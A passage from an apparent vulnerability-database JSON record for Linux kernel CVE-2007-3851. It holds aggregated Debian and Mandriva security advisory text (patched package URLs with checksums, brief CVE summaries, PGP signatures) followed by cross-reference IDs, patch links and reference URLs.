http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-5-xen-vserver-686_2.6.18.dfsg.1-13etch1_i386.deb\n      Size/MD5 checksum:    50636 9277c97ebb5c14fc93c5449c5e5a391c\n\n  Intel IA-64 architecture:\n\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_ia64.deb\n      Size/MD5 checksum:  3078390 7c1dc7cf08fdce40fdb01acd14c6167b\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_ia64.deb\n      Size/MD5 checksum:    50644 4303c1255e6d4840b9ce34b8da158125\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-ia64_2.6.18.dfsg.1-13etch1_ia64.deb\n      Size/MD5 checksum:    50662 5235fb30a8f35c91ea15335ee439a60d\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-itanium_2.6.18.dfsg.1-13etch1_ia64.deb\n      Size/MD5 checksum:   251576 5b89eeb214501b0a1b6e2d2712763fe3\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-mckinley_2.6.18.dfsg.1-13etch1_ia64.deb\n      Size/MD5 checksum:   251558 573aa9cc9fba9924a98a1b6ca786edfe\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-itanium_2.6.18.dfsg.1-13etch1_ia64.deb\n      Size/MD5 checksum: 28008514 baaf3f87d60cb1d68c361cea849d3c27\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-mckinley_2.6.18.dfsg.1-13etch1_ia64.deb\n      Size/MD5 checksum: 28178022 c6cb8de82903383b78c7a9646d7df7da\n\n  Big endian MIPS architecture:\n\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_mips.deb\n      Size/MD5 checksum:  3346354 c0c5d438a80a114ffbe515104f44785f\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_mips.deb\n      Size/MD5 checksum:    50644 822db9efc5caba5bd3f96c2ffef90ce8\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-mips_2.6.18.dfsg.1-13etch1_mips.deb\n      Size/MD5 checksum:    50692 9fbd9cb53ce75b25243adfb5568bd2f9\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-qemu_2.6.18.dfsg.1-13etch1_mips.deb\n      Size/MD5 checksum:   146348 4a2ede92f7cba5e409a01504a5787786\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r4k-ip22_2.6.18.dfsg.1-13etch1_mips.deb\n      Size/MD5 checksum:   156600 b56c8fe624757cca08eafda9a7b62122\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r5k-ip32_2.6.18.dfsg.1-13etch1_mips.deb\n      Size/MD5 checksum:   160930 14710075883c5cb17ed1f4dfa854461f\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch1_mips.deb\n      Size/MD5 checksum:   179380 f61160dd2e459a70170e5ba8524aea36\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch1_mips.deb\n      Size/MD5 checksum:   179154 aba921bcc75c80c0c96c727eac34afaf\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-qemu_2.6.18.dfsg.1-13etch1_mips.deb\n      Size/MD5 checksum:  6090314 99e9641ce38b6d0530199ad566738d73\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r4k-ip22_2.6.18.dfsg.1-13etch1_mips.deb\n      Size/MD5 checksum:  8271518 6979492cd1b01cf3b76958211bfb3bdf\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r5k-ip32_2.6.18.dfsg.1-13etch1_mips.deb\n      Size/MD5 checksum:  9037182 56824fbbc825d14d2fec62b2562f44ce\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch1_mips.deb\n      Size/MD5 checksum: 15636546 85bc62cca019e5d5c07374fe4ea05df8\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch1_mips.deb\n      Size/MD5 checksum: 15608670 233369e78b74fdca2143c971995440f5\n\n  Little endian MIPS architecture:\n\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_mipsel.deb\n      Size/MD5 checksum:  3346628 a208480b2fa7bdd13559b4078d03cac9\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_mipsel.deb\n      Size/MD5 checksum:    50648 20d1bf2c345a889720562597f9300152\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-mipsel_2.6.18.dfsg.1-13etch1_mipsel.deb\n      Size/MD5 checksum:    50712 31666ed837cac8aec136528616a7407f\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-qemu_2.6.18.dfsg.1-13etch1_mipsel.deb\n      Size/MD5 checksum:   146012 ec774ccba8d1783239b0f12cee90abe3\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r3k-kn02_2.6.18.dfsg.1-13etch1_mipsel.deb\n      Size/MD5 checksum:   152252 99657c9b655c5f1bded07e4a5394d132\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r4k-kn04_2.6.18.dfsg.1-13etch1_mipsel.deb\n      Size/MD5 checksum:   152340 0c0778fa59bda664f8cb4f0f1ba8f90b\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-r5k-cobalt_2.6.18.dfsg.1-13etch1_mipsel.deb\n      Size/MD5 checksum:   174444 8927ed0b8d880d99fcc79c64ecc44c54\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch1_mipsel.deb\n      Size/MD5 checksum:   179284 8b01ba01c4d2e0e4a1dbfd4acd5354ea\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch1_mipsel.deb\n      Size/MD5 checksum:   179144 368da689abd47ca70aced24efec5b040\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-qemu_2.6.18.dfsg.1-13etch1_mipsel.deb\n      Size/MD5 checksum:  6025698 a355ec38f440f7e08d0f22ce6184bcf8\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r3k-kn02_2.6.18.dfsg.1-13etch1_mipsel.deb\n      Size/MD5 checksum:  5937952 2de36f1fdeb55373eb50fb77efe7f938\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r4k-kn04_2.6.18.dfsg.1-13etch1_mipsel.deb\n      Size/MD5 checksum:  5921402 006d6d3d34f2db5b21500cdc8914dc08\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-r5k-cobalt_2.6.18.dfsg.1-13etch1_mipsel.deb\n      Size/MD5 checksum:  9857018 4246c3b15aae0df84b669381a8f1383e\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1-bcm91250a_2.6.18.dfsg.1-13etch1_mipsel.deb\n      Size/MD5 checksum: 15052960 317130eff4221493bf31349bb99d0eab\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sb1a-bcm91480b_2.6.18.dfsg.1-13etch1_mipsel.deb\n      Size/MD5 checksum: 15019204 a5c6e183ff53d3c8fd169f0d2bc17ebc\n\n  PowerPC architecture:\n\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_powerpc.deb\n      Size/MD5 checksum:  3388916 6d6415c4241ea26786fd3a72899e266f\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_powerpc.deb\n      Size/MD5 checksum:    50652 f19e0ad61b5e91f685e920a58248c8e9\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb\n      Size/MD5 checksum:    50698 111c11da4f26a93122b76b6eac5b92c8\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb\n      Size/MD5 checksum:   248366 7bafbd435e00ad6b647b347d84e1e0c1\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc-miboot_2.6.18.dfsg.1-13etch1_powerpc.deb\n      Size/MD5 checksum:   225218 90e19db35ef618a7e3f476576de60d95\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc-smp_2.6.18.dfsg.1-13etch1_powerpc.deb\n      Size/MD5 checksum:   248400 3dd8373a35220a27423c3f4eadd32358\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-powerpc64_2.6.18.dfsg.1-13etch1_powerpc.deb\n      Size/MD5 checksum:   248712 8a0281e9b856372f4d01c8a0f4b02d72\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-prep_2.6.18.dfsg.1-13etch1_powerpc.deb\n      Size/MD5 checksum:   242934 92f3fda2938f60fdf6f957f0659712ab\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_powerpc.deb\n      Size/MD5 checksum:  3411216 b9070329bf0a6045896db2fc15f66f0a\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb\n      Size/MD5 checksum:   248448 e108e05b4fe2239d4e95fb6598405fd6\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-powerpc64_2.6.18.dfsg.1-13etch1_powerpc.deb\n      Size/MD5 checksum:   249006 3908dfaf4f518192bd550ca5ac45476f\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb\n      Size/MD5 checksum: 16623606 b76fa67819092073c6bfc51904163278\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc-miboot_2.6.18.dfsg.1-13etch1_powerpc.deb\n      Size/MD5 checksum: 15149270 502237df8e0f90e7ab95b28cbe7a5f8f\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc-smp_2.6.18.dfsg.1-13etch1_powerpc.deb\n      Size/MD5 checksum: 16960668 69f13fe8bde671497363849f76636eda\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-powerpc64_2.6.18.dfsg.1-13etch1_powerpc.deb\n      Size/MD5 checksum: 18291108 9cc68d73b1bcf401176d1f93bd1dfeb1\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-prep_2.6.18.dfsg.1-13etch1_powerpc.deb\n      Size/MD5 checksum: 16395670 fbab6e355aba9c29f63603d097855c5e\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-powerpc_2.6.18.dfsg.1-13etch1_powerpc.deb\n      Size/MD5 checksum: 17006732 cca0573ca442e02ad6f153fcc059f734\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-powerpc64_2.6.18.dfsg.1-13etch1_powerpc.deb\n      Size/MD5 checksum: 18340518 3940b166f8b0464baa118c8557922edb\n\n  IBM S/390 architecture:\n\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_s390.deb\n      Size/MD5 checksum:  2939624 fada85c4d5ec9cbdee803116fde561b1\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_s390.deb\n      Size/MD5 checksum:    50642 9478b247c93b2ba8b405f93b525307ae\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-s390_2.6.18.dfsg.1-13etch1_s390.deb\n      Size/MD5 checksum:    50664 d694fdeff900e5b1ba575ad15bbd5310\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-s390_2.6.18.dfsg.1-13etch1_s390.deb\n      Size/MD5 checksum:   139294 02bcbe57d1b62129243c8cb4b7bb8d2d\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-s390x_2.6.18.dfsg.1-13etch1_s390.deb\n      Size/MD5 checksum:   139538 69993d0e2867ed4efa5bb0e442d3d014\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_s390.deb\n      Size/MD5 checksum:  2962698 36d89e72ac15117d15a3488878d205a4\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-s390x_2.6.18.dfsg.1-13etch1_s390.deb\n      Size/MD5 checksum:   140274 5b8bacca256347a7ce02783651110e35\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s390_2.6.18.dfsg.1-13etch1_s390.deb\n      Size/MD5 checksum:  5398576 b1054f70f0472fd020241b6af904438d\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s390-tape_2.6.18.dfsg.1-13etch1_s390.deb\n      Size/MD5 checksum:  1435060 daf41750946017171aad603b9218d0c4\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-s390x_2.6.18.dfsg.1-13etch1_s390.deb\n      Size/MD5 checksum:  5613112 68d67210c4c6aa0ea54b1754df137d8e\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-s390x_2.6.18.dfsg.1-13etch1_s390.deb\n      Size/MD5 checksum:  5659570 c6a2db3553a427cecf69d9f1258e9444\n\n  Sun Sparc architecture:\n\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5_2.6.18.dfsg.1-13etch1_sparc.deb\n      Size/MD5 checksum:  3164578 902a8ff3089225278575251ba13f1f98\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all_2.6.18.dfsg.1-13etch1_sparc.deb\n      Size/MD5 checksum:    50640 455bd9863c6f183ee28d15e7ba9ddc38\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-all-sparc_2.6.18.dfsg.1-13etch1_sparc.deb\n      Size/MD5 checksum:    50674 8416d5c20659923183729457854e139f\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sparc32_2.6.18.dfsg.1-13etch1_sparc.deb\n      Size/MD5 checksum:   161886 f58a554b0de7e05c4727bff1e236a069\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sparc64_2.6.18.dfsg.1-13etch1_sparc.deb\n      Size/MD5 checksum:   191010 bad7bf07af89b1ba54ff559f99cf3d1b\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-sparc64-smp_2.6.18.dfsg.1-13etch1_sparc.deb\n      Size/MD5 checksum:   191776 f059b7c75ea312f69758d02e6da4cd4f\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver_2.6.18.dfsg.1-13etch1_sparc.deb\n      Size/MD5 checksum:  3186936 2a865cc6aed95cdc0ed3ebb20ec0a6d0\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-5-vserver-sparc64_2.6.18.dfsg.1-13etch1_sparc.deb\n      Size/MD5 checksum:   192172 197b2cd91975cbda876bc0ac18244870\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sparc32_2.6.18.dfsg.1-13etch1_sparc.deb\n      Size/MD5 checksum:  6406184 e0ce977a5c79906c4996f069672e272b\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sparc64_2.6.18.dfsg.1-13etch1_sparc.deb\n      Size/MD5 checksum: 10351700 69bc68d296d9134f6df792fb745c9810\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sparc64-smp_2.6.18.dfsg.1-13etch1_sparc.deb\n      Size/MD5 checksum: 10610496 b40bc9a07de220a54a1489b22d1d60f4\n    http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-sparc64_2.6.18.dfsg.1-13etch1_sparc.deb\n      Size/MD5 checksum: 10656362 91c6c66c24c7d5ca45c0e6eb5dcdcbba\n\n  These files will probably be moved into the stable distribution on\n  its next update. \n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ etch/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/etch/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show \u003cpkg\u003e\u0027 and http://packages.debian.org/\u003cpkg\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.6 (GNU/Linux)\n\niD8DBQFGw6BUhuANDBmkLRkRAoORAJ9xahJqDWTm6CV7/bRjmcFCfPYJuACcDG5b\n2aO+KPMNmsXmfH9W/1fMQtM=\n=L22s\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. (CVE-2007-4133)\n \n The IA32 system call emulation functionality in Linux kernel 2.4.x\n and 2.6.x before 2.6.22.7, when running on the x86_64 architecture,\n does not zero extend the eax register after the 32bit entry path to\n ptrace is used, which might allow local users to gain privileges by\n triggering an out-of-bounds access to the system call table using\n the %RAX register. (CVE-2007-4573)\n \n Integer underflow in the ieee80211_rx function in\n net/ieee80211/ieee80211_rx.c in the Linux kernel 2.6.x before\n 2.6.23 allows remote attackers to cause a denial of service (crash)\n via a crafted SKB length value in a runt IEEE 802.11 frame when\n the IEEE80211_STYPE_QOS_DATA flag is set, aka an off-by-two\n error. (CVE-2007-4997)\n \n The disconnect method in the Philips USB Webcam (pwc) driver in Linux\n kernel 2.6.x before 2.6.22.6 relies on user space to close the device,\n which allows user-assisted local attackers to cause a denial of service\n (USB subsystem hang and CPU consumption in khubd) by not closing the\n device after the disconnect is invoked. NOTE: this rarely crosses\n privilege boundaries, unless the attacker can convince the victim to\n unplug the affected device.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.9 (GNU/Linux)\n\niD8DBQFIM/QcmqjQ0CJFipgRAua3AKCyF+W5X84EyQ0rcplkQs8m3TeBDQCgvo2f\nAEfloFQ4ShfC936g0fSh5vo=\n=RHR2\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-3851"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000692"
      },
      {
        "db": "BID",
        "id": "25263"
      },
      {
        "db": "VULHUB",
        "id": "VHN-27213"
      },
      {
        "db": "VULMON",
        "id": "CVE-2007-3851"
      },
      {
        "db": "PACKETSTORM",
        "id": "59004"
      },
      {
        "db": "PACKETSTORM",
        "id": "58993"
      },
      {
        "db": "PACKETSTORM",
        "id": "58639"
      },
      {
        "db": "PACKETSTORM",
        "id": "66584"
      }
    ],
    "trust": 2.43
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2007-3851",
        "trust": 3.3
      },
      {
        "db": "BID",
        "id": "25263",
        "trust": 2.9
      },
      {
        "db": "SECUNIA",
        "id": "26389",
        "trust": 2.6
      },
      {
        "db": "SECUNIA",
        "id": "26450",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "27227",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "26500",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "26760",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "26643",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "26664",
        "trust": 1.8
      },
      {
        "db": "VUPEN",
        "id": "ADV-2007-2854",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000692",
        "trust": 0.8
      },
      {
        "db": "UBUNTU",
        "id": "USN-509-1",
        "trust": 0.6
      },
      {
        "db": "UBUNTU",
        "id": "USN-510-1",
        "trust": 0.6
      },
      {
        "db": "MANDRIVA",
        "id": "MDVSA-2008:105",
        "trust": 0.6
      },
      {
        "db": "SUSE",
        "id": "SUSE-SA:2007:051",
        "trust": 0.6
      },
      {
        "db": "SUSE",
        "id": "SUSE-SA:2007:053",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2007:0705",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1356",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200708-174",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-27213",
        "trust": 0.1
      },
      {
        "db": "VUPEN",
        "id": "2007/2854",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2007-3851",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "59004",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "58993",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "58639",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "66584",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-27213"
      },
      {
        "db": "VULMON",
        "id": "CVE-2007-3851"
      },
      {
        "db": "BID",
        "id": "25263"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000692"
      },
      {
        "db": "PACKETSTORM",
        "id": "59004"
      },
      {
        "db": "PACKETSTORM",
        "id": "58993"
      },
      {
        "db": "PACKETSTORM",
        "id": "58639"
      },
      {
        "db": "PACKETSTORM",
        "id": "66584"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200708-174"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3851"
      }
    ]
  },
  "id": "VAR-200708-0604",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-27213"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T20:27:48.307000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "ChangeLog-2.6.22.2",
        "trust": 0.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/changelog-2.6.22.2"
      },
      {
        "title": "RHSA-2007:0705",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2007-0705.html"
      },
      {
        "title": "RHSA-2007:0705",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2007-0705j.html"
      },
      {
        "title": "Ubuntu Security Notice: linux-source-2.6.17 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-509-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-source-2.6.20 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-510-1"
      },
      {
        "title": "Debian Security Advisories: DSA-1356-1 linux-2.6 -- several vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=dbc12ca9823e98eb7504357da5ff0825"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2007-3851"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000692"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-399",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-27213"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000692"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3851"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.7,
        "url": "http://www.securityfocus.com/bid/25263"
      },
      {
        "trust": 2.6,
        "url": "http://secunia.com/advisories/26389"
      },
      {
        "trust": 2.1,
        "url": "http://kernel.org/pub/linux/kernel/v2.6/changelog-2.6.22.2"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/26450"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/26500"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/26643"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/26664"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/26760"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/27227"
      },
      {
        "trust": 1.8,
        "url": "http://www.debian.org/security/2007/dsa-1356"
      },
      {
        "trust": 1.8,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2008:105"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2007-0705.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.novell.com/linux/security/advisories/2007_51_kernel.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.novell.com/linux/security/advisories/2007_53_kernel.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.ubuntu.com/usn/usn-509-1"
      },
      {
        "trust": 1.8,
        "url": "http://www.ubuntu.com/usn/usn-510-1"
      },
      {
        "trust": 1.8,
        "url": "https://issues.rpath.com/browse/rpl-1620"
      },
      {
        "trust": 1.4,
        "url": "http://www.frsirt.com/english/advisories/2007/2854"
      },
      {
        "trust": 1.2,
        "url": "http://www.vupen.com/english/advisories/2007/2854"
      },
      {
        "trust": 1.2,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a11196"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3851"
      },
      {
        "trust": 0.8,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-3851"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3851"
      },
      {
        "trust": 0.3,
        "url": "https://rhn.redhat.com/errata/rhsa-2007-0705.html"
      },
      {
        "trust": 0.3,
        "url": "http://support.novell.com/techcenter/psdb/a4e6d19f94707022b621550d1049f74e.html"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3513"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3848"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2876"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3105"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3104"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4308"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3642"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2525"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/399.html"
      },
      {
